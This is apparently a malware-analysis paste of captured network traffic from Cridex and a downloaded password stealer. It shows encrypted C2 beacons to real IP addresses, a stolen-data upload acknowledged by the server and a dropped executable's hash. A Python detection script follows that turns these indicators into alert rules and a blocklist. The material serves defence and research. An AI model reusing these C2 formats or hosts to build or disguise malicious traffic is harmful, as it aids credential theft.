MalwareMustDie

Cridex + downloaded password stealer Network Traffic

Dec 15th, 2012
-----------details-internet traffic-------------------
// Try to reach 208.87.243.18
192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// An HTTP POST to 74.207.237.170:8080
192.168.7.84 74.207.237.170:8080 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf ...?@... .....TJ.
0020 ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18 ......ZT .....[P.
0030 42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6 B0'0.... ....dU..
0040 5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52 ZP....Y. yy..|4$R
0050 a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31 .".....u ...+T..1
: : : :
0130 70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75 p.W..0.m ....A?.u
0140 c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b ....=|<. \.'.....
0150 88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7 ..5._7'. .46..G\.
0160 6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf o" ....} ...E..K.
0170 d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8 ..2eE.., .U.=.C..
0180 d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40 ..KtU... .u..2.~@
0190 7c |

// The reply is a long blob of encrypted binary data...

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
n..Z...fG..t...1.|...`Vsnip
...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
%.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
.g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
:
:snip
:
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
0

// Some more communication: tries to connect to 132.248.49.112

192.168.7.84 132.248.49.112 TCP afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// At this point the previous data was saved in the %Temp% folder:


FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880
MD5 ce7474646297ed818bb8ed48f50c7e1e


// DNS (reverse lookup) requests to...

112.49.248.132.in-addr.arpa web.ecologia.unam.mx
77.65.130.113.in-addr.arpa ns.shinbiro.com..domain

00000000 35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32 5....... .....112
00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 ddr.arpa .....
00000000 35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32 5....... .....112
00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 ddr.arpa ........
00000030 0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63 ........ ..web.ec
00000040 6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00 ologia.u nam.mx.
0000002D cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02 .a...... .....77.
0000003D 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
0000004D 64 72 04 61 72 70 61 00 00 0c 00 01 dr.arpa. ....
0000004F cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02 .a...... .....77.
0000005F 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
0000006F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06 dr.arpa. ........
0000007F 00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e ........ .ns.shin
0000008F 62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e biro.com ..domain
0000009F c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
000000AF 75 00 00 01 51 80 u...Q.


// Another POST detected, to 203.113.98.131:80
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 257
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
.....}..5.+..6.SD4.>
t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:01:37 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16

STATUS-IMPORT-OK

// At this point the malware process exp2.tmp.exe was started....


---------------take 2---------------------

// send ACK packet (try to connect) to 74.207.237.170

192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// send ping to 209.190.61.50

209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)


// communicates via HTTP/POST with 174.143.174.136:8080

// post....
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache
.m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
.....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
.+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
.~q.+......Sk.i...........t....!.m*......;..w."...[.'
..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK

// reply:
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......\z#W.2.Pp_..NU..


// post...
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK

// reply....
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`........X.'8...".~K..J.



// Try to establish a connection with 199.71.215.194

192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// Communication via HTTP/POST with 210.56.23.100:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 210.56.23.100:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
.(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
V.R
...-v!..38s)ab|....bKU..$..S..</.
)4..1+...>.O.....HTTP/1.1 200 OK

Server: nginx/1.0.11
Date: Sat, 15 Dec 2012 10:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.........c.M..A..9.....

// try to connect again with 132.248.49.112

192.168.7.84 132.248.49.112 TCP rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 192.168.7.84 TCP http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// try to connect w/ 74.117.61.66

192.168.7.84 74.117.61.66 TCP socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
74.117.61.66 192.168.7.84 TCP http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

  253.  
// Try to communicate w/ 173.192.229.36

173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1


// Communication via HTTP/POST with 69.64.89.82:8080


POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
..[.
8.|.
. ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
.......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
.e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:51:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......O..z.zj....>..;..


// try to establish conn to: 173.224.221.135

192.168.7.84 173.224.221.135 TCP ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
173.224.221.135 192.168.7.84 TCP http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// try to establish conn to: 59.90.221.6

192.168.7.84 59.90.221.6 TCP ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
59.90.221.6 192.168.7.84 TCP http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// try to establish conn to 180.235.150.72

192.168.7.84 180.235.150.72 TCP sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
180.235.150.72 192.168.7.84 TCP http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communicating via HTTP/POST to 123.49.61.59:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
...:..'....F..oP.Ka.2U.d....N~9..|.....,..
...
8....!'......Cr..,.8
..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
..9..:...;I\....G/.G....HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
.l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
..jW.qO.*.j.'..f)I_7.
R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......,.&.3.."cz@..[.a.


// Communicating via HTTP/POST with 123.49.61.59:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
.K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.........X)myU.>.^....J


// Try to establish conn to: 113.130.65.77

192.168.7.84 113.130.65.77 TCP hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77 192.168.7.84 TCP http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try to establish conn to: 180.235.150.72

802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// communicating via HTTP/POST with 69.64.89.82:8080


POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
.X...j.K.!L.C..............3.8.|...........w..9...W
.K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
l...[.h.........-.zR..J\...".Q
w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
.T..3!k..T.U=1N.~d.c..C.m....
..}..&..y_5..u
..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:55:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......]...v.T.v..%s.\.$

-----------------------------internet data ends--------------------
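Two HTTP patterns repeat through this capture: the Cridex beacon (POST to /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ on port 8080, the "MSIE 7.0; Windows NT 6.0" user-agent, Cache-Control: no-cache and an opaque encrypted body) and the stealer's upload to /asp/intro.php, whose body starts with CRYPTED0 and which the server acknowledges with STATUS-IMPORT-OK. The following is an added example, not part of MalwareMustDie's paste: a small Python matcher that parses raw HTTP request/response pairs, applies those indicators as detection rules, and collects the matched server endpoints into a blocklist. The indicator strings and header values are copied from the dump above; the sample request bodies, the function names (parse_http, inspect_exchange, c2_blocklist) and the benign host 198.51.100.7 are constructed for this example.

```python
# Added example: detection rules for the two HTTP patterns in the capture above.
# Indicator values are copied from the dump; sample bodies are constructed.
import string
from dataclasses import dataclass
from typing import Dict, List, Optional

CRIDEX_C2_PATH = "/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/"
CRIDEX_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
STEALER_PATH = "/asp/intro.php"
STEALER_BODY_MAGIC = b"CRYPTED0"
STEALER_REPLY_MARKER = b"STATUS-IMPORT-OK"
PRINTABLE = set(string.printable.encode())

@dataclass
class HttpMessage:
    start_line: str
    headers: Dict[str, str]  # header names lower-cased
    body: bytes

def parse_http(raw: bytes) -> HttpMessage:
    """Split a raw HTTP request or response into start line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)

def looks_binary(body: bytes, threshold: float = 0.3) -> bool:
    """True when more than `threshold` of the body bytes are not printable ASCII."""
    if not body:
        return False
    return sum(1 for b in body if b not in PRINTABLE) / len(body) > threshold

@dataclass
class Alert:
    rule: str
    dst: str  # server "ip:port"
    detail: str

def inspect_exchange(dst_ip: str, dst_port: int, request: bytes,
                     response: Optional[bytes] = None) -> List[Alert]:
    """Apply the capture-derived rules to one request (and optional response)."""
    req = parse_http(request)
    dst = f"{dst_ip}:{dst_port}"
    method, _, target = req.start_line.partition(" ")
    path = target.split(" ")[0]
    ua = req.headers.get("user-agent", "")
    alerts: List[Alert] = []
    # Rule 1: Cridex beacon - POST to the fixed C2 path with the MSIE 7.0 UA,
    # Cache-Control: no-cache and an opaque (encrypted) body.
    if (method == "POST" and path == CRIDEX_C2_PATH and ua == CRIDEX_UA
            and req.headers.get("cache-control") == "no-cache"
            and looks_binary(req.body)):
        alerts.append(Alert("cridex_c2_beacon", dst,
                            f"{len(req.body)}-byte encrypted POST to C2 path"))
    # Rule 2: stealer upload - POST to /asp/intro.php, binary body starting CRYPTED0.
    if (method == "POST" and path == STEALER_PATH
            and req.headers.get("content-encoding") == "binary"
            and req.body.startswith(STEALER_BODY_MAGIC)):
        alerts.append(Alert("stealer_exfil", dst,
                            f"CRYPTED0 blob of {len(req.body)} bytes, UA={ua!r}"))
        # Rule 3: the server acknowledged the import, so treat the credentials as taken.
        if response is not None and parse_http(response).body.strip() == STEALER_REPLY_MARKER:
            alerts.append(Alert("stealer_import_ok", dst, "server replied STATUS-IMPORT-OK"))
    return alerts

def c2_blocklist(alerts: List[Alert]) -> List[str]:
    """Distinct server endpoints from the alerts, sorted, for a proxy or firewall deny list."""
    return sorted({a.dst for a in alerts})

def opaque_bytes(n: int) -> bytes:
    """Constructed stand-in for the encrypted payloads the dump only shows as dots."""
    return bytes((i * 37 + 11) % 256 for i in range(n))

# Constructed samples: headers as seen in the capture, bodies synthesised above.
CRIDEX_REQUEST = (
    b"POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\n"
    b"User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\r\n"
    b"Host: 74.207.237.170:8080\r\nContent-Length: 347\r\nConnection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n\r\n" + opaque_bytes(347))
STEALER_REQUEST = (
    b"POST /asp/intro.php HTTP/1.0\r\nHost: 203.113.98.131\r\nAccept: */*\r\n"
    b"Content-Length: 257\r\nConnection: close\r\nContent-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"\r\n" + STEALER_BODY_MAGIC + opaque_bytes(249))
STEALER_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.0.10\r\nConnection: close\r\n"
                    b"Content-Length: 16\r\n\r\nSTATUS-IMPORT-OK")
BENIGN_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: 198.51.100.7\r\n\r\n"

def run_demo() -> List[Alert]:
    """Run the three samples through the rules; 198.51.100.7 is a constructed benign host."""
    hits = inspect_exchange("74.207.237.170", 8080, CRIDEX_REQUEST)
    hits += inspect_exchange("203.113.98.131", 80, STEALER_REQUEST, STEALER_RESPONSE)
    hits += inspect_exchange("198.51.100.7", 80, BENIGN_REQUEST)
    return hits

if __name__ == "__main__":
    found = run_demo()
    for a in found:
        print(f"[{a.rule}] {a.dst}: {a.detail}")
    print("blocklist:", c2_blocklist(found))
```

The beacon rule deliberately combines path, user-agent, the no-cache header and a binary-body check rather than matching the path alone, since the path is the only strong indicator and a proxy log without bodies would need the other three to avoid false positives; the stealer_import_ok rule exists so that an analyst can tell a blocked upload from one the C2 actually accepted.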